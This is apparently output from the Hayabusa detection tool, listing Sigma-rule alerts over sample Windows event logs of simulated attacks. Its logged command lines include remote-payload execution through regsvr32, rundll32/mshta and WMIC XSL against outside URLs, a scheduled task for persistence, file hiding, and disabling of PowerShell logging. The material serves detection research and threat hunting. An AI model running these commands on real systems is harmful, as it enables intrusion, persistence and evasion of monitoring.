2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
